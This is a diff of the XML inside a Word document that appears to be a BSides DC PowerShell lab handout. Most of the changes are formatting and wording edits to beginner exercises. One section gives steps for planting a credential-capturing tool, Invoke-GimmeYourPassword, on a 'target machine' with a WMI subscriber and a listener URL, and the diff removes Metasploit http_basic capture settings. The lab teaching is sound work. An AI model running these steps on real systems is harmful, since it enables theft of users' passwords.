--- a/Labs_BSidesDC_V1.docx
+++ b/Labs_BSidesDC_V1.docx
@@ -6,6 +6,8 @@
       <w:pPr>
         <w:pStyle w:val="Style1"/>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Heading1Char"/>
@@ -1642,6 +1644,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
         <w:rPr>
           <w:rStyle w:val="CharacterStyle1"/>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1728,11 +1735,11 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shapetype w14:anchorId="783227B9" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
+              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                 <v:stroke joinstyle="miter"/>
                 <v:path gradientshapeok="t" o:connecttype="rect"/>
               </v:shapetype>
-              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:170.9pt;margin-top:172.8pt;width:106.4pt;height:21.7pt;z-index:251667456;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:170.9pt;margin-top:172.8pt;width:106.4pt;height:21.7pt;z-index:251667456;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
@@ -1823,7 +1830,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="00D4A123" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:174pt;margin-top:74.95pt;width:103.3pt;height:21.7pt;z-index:251664384;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:174pt;margin-top:74.95pt;width:103.3pt;height:21.7pt;z-index:251664384;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
@@ -1882,6 +1889,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
         <w:rPr>
           <w:rStyle w:val="CharacterStyle1"/>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2019,19 +2031,36 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> window find your IP address – ipconfig.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:rStyle w:val="CharacterStyle1"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> window find your IP address – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">simply type </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ipconfig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2743,7 +2772,26 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Just in case you weren’t following along, type Get-Command in your PowerShell console</w:t>
+        <w:t xml:space="preserve">Just in case you weren’t following along, type </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Get-Command</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in your PowerShell console</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3738,17 +3786,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:rStyle w:val="CharacterStyle1"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:rStyle w:val="CharacterStyle1"/>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3916,7 +3953,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Try iterating through the array on your own.</w:t>
       </w:r>
     </w:p>
@@ -3941,6 +3977,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>You can also interact with the properties of the object for example the name property. To see a list of only the names of the running services type $variable1.name</w:t>
       </w:r>
     </w:p>
@@ -4933,8 +4970,17 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t xml:space="preserve">Instead of a where-object what happens if you type get-process notepad? </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Instead of a where-object what happens if you type get-process notepad? Go ahead and try it.</w:t>
+        <w:t>Go ahead and try it.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5642,23 +5688,23 @@
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
       <w:r>
+        <w:t xml:space="preserve">Run a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> again. See anything new?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Run a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> again. See anything new?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-      </w:pPr>
-      <w:r>
         <w:t xml:space="preserve">Cd to the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -6276,6 +6322,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Activity</w:t>
       </w:r>
     </w:p>
@@ -7219,6 +7266,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Estimated completion </w:t>
       </w:r>
       <w:r>
@@ -7648,7 +7696,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>If it was permanent make it so.</w:t>
+        <w:t>If it was</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>n’t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> permanent make it so.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8248,6 +8314,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Stage 1: Background Questions </w:t>
       </w:r>
     </w:p>
@@ -9299,7 +9366,6 @@
         <w:rPr>
           <w:rFonts w:eastAsia="Garamond"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Gain familiarity using a .net static class. </w:t>
       </w:r>
       <w:r>
@@ -9328,6 +9394,7 @@
           <w:rFonts w:eastAsia="Garamond"/>
           <w:spacing w:val="-2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Download a file using the appropriate .net class</w:t>
       </w:r>
     </w:p>
@@ -9898,247 +9965,94 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="560"/>
-          <w:tab w:val="left" w:pos="1120"/>
-          <w:tab w:val="left" w:pos="1680"/>
-          <w:tab w:val="left" w:pos="2240"/>
-          <w:tab w:val="left" w:pos="2800"/>
-          <w:tab w:val="left" w:pos="3360"/>
-          <w:tab w:val="left" w:pos="3920"/>
-          <w:tab w:val="left" w:pos="4480"/>
-          <w:tab w:val="left" w:pos="5040"/>
-          <w:tab w:val="left" w:pos="5600"/>
-          <w:tab w:val="left" w:pos="6160"/>
-          <w:tab w:val="left" w:pos="6720"/>
-        </w:tabs>
-        <w:kinsoku/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:ind w:left="2520"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Need to get this from my home machine which is done</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>use auxiliary/server/capture/</w:t>
+        <w:t>Put a copy of Invoke-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t>http_basic</w:t>
+        <w:t>gimmeyourpassword</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="560"/>
-          <w:tab w:val="left" w:pos="1120"/>
-          <w:tab w:val="left" w:pos="1680"/>
-          <w:tab w:val="left" w:pos="2240"/>
-          <w:tab w:val="left" w:pos="2800"/>
-          <w:tab w:val="left" w:pos="3360"/>
-          <w:tab w:val="left" w:pos="3920"/>
-          <w:tab w:val="left" w:pos="4480"/>
-          <w:tab w:val="left" w:pos="5040"/>
-          <w:tab w:val="left" w:pos="5600"/>
-          <w:tab w:val="left" w:pos="6160"/>
-          <w:tab w:val="left" w:pos="6720"/>
-        </w:tabs>
-        <w:kinsoku/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">set </w:t>
+      <w:r>
+        <w:t xml:space="preserve"> onto your target machine. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Import-module invoke-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t>RedirectURL</w:t>
+        <w:t>gimmeyourpassword</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> www.google.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="560"/>
-          <w:tab w:val="left" w:pos="1120"/>
-          <w:tab w:val="left" w:pos="1680"/>
-          <w:tab w:val="left" w:pos="2240"/>
-          <w:tab w:val="left" w:pos="2800"/>
-          <w:tab w:val="left" w:pos="3360"/>
-          <w:tab w:val="left" w:pos="3920"/>
-          <w:tab w:val="left" w:pos="4480"/>
-          <w:tab w:val="left" w:pos="5040"/>
-          <w:tab w:val="left" w:pos="5600"/>
-          <w:tab w:val="left" w:pos="6160"/>
-          <w:tab w:val="left" w:pos="6720"/>
-        </w:tabs>
-        <w:kinsoku/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">set </w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">At this time, the script is written to look in one of two places. I have an if statement that will look for a particular key that I use for demos. If that key is present, the folder in which the tool will look for has been hardcoded. Creating the demo key will be the easiest way to run this. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If you choose not to use the demo key, the tool will look at the most recently used registry value for </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t>srvport</w:t>
+        <w:t>wordpad</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 80</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="560"/>
-          <w:tab w:val="left" w:pos="1120"/>
-          <w:tab w:val="left" w:pos="1680"/>
-          <w:tab w:val="left" w:pos="2240"/>
-          <w:tab w:val="left" w:pos="2800"/>
-          <w:tab w:val="left" w:pos="3360"/>
-          <w:tab w:val="left" w:pos="3920"/>
-          <w:tab w:val="left" w:pos="4480"/>
-          <w:tab w:val="left" w:pos="5040"/>
-          <w:tab w:val="left" w:pos="5600"/>
-          <w:tab w:val="left" w:pos="6160"/>
-          <w:tab w:val="left" w:pos="6720"/>
-        </w:tabs>
-        <w:kinsoku/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">set </w:t>
+        <w:t xml:space="preserve"> and will set the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t>ssl</w:t>
+        <w:t>wmisubscriber</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> false </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="560"/>
-          <w:tab w:val="left" w:pos="1120"/>
-          <w:tab w:val="left" w:pos="1680"/>
-          <w:tab w:val="left" w:pos="2240"/>
-          <w:tab w:val="left" w:pos="2800"/>
-          <w:tab w:val="left" w:pos="3360"/>
-          <w:tab w:val="left" w:pos="3920"/>
-          <w:tab w:val="left" w:pos="4480"/>
-          <w:tab w:val="left" w:pos="5040"/>
-          <w:tab w:val="left" w:pos="5600"/>
-          <w:tab w:val="left" w:pos="6160"/>
-          <w:tab w:val="left" w:pos="6720"/>
-        </w:tabs>
-        <w:kinsoku/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:spacing w:val="0"/>
-        </w:rPr>
-        <w:t>set URIPATH /</w:t>
+        <w:t xml:space="preserve"> to listen here. If you want to see what that path is currently set too, use the function search-keys</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10146,19 +10060,20 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Put a copy of Invoke-</w:t>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If bullet five was </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>gimmeyourpassword</w:t>
+        <w:t>to</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> onto your target machine. </w:t>
+        <w:t xml:space="preserve"> long, use search-keys</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10166,124 +10081,41 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
+          <w:numId w:val="31"/>
         </w:numPr>
         <w:ind w:left="1800"/>
       </w:pPr>
       <w:r>
-        <w:t>Import-module invoke-</w:t>
+        <w:t>Once the path is set, run the following function:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:ind w:left="1800"/>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Invoke-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>gimmeyourpassword</w:t>
+        <w:t>GimmeYourPassword</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">At this time, the script is written to look in one of two places. I have an if statement that will look for a particular key that I use for demos. If that key is present, the folder in which the tool will look for has been hardcoded. Creating the demo key will be the easiest way to run this. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If you choose not to use the demo key, the tool will look at the most recently used registry value for </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wordpad</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and will set the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wmisubscriber</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to listen here. If you want to see what that path is currently set too, use the function search-keys</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If bullet five was </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> long, use search-keys</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Once the path is set, run the following function:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-        <w:rPr>
-          <w:rStyle w:val="CharacterStyle1"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:r>
-        <w:t>Invoke-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GimmeYourPassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> -URL &lt;IP of listener set in step 1&gt;</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="0"/>
     <w:sectPr>
       <w:pgSz w:w="11899" w:h="15499"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
@@ -10917,7 +10749,7 @@
   <w:abstractNum w:abstractNumId="8">
     <w:nsid w:val="25B706B8"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="73561320"/>
+    <w:tmpl w:val="A384A6F4"/>
     <w:lvl w:ilvl="0" w:tplc="04090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -10930,7 +10762,7 @@
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090003">
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -12251,92 +12083,6 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="23">
-    <w:nsid w:val="6D3F50AA"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="A7C25A9E"/>
-    <w:lvl w:ilvl="0" w:tplc="0409000F">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2160" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
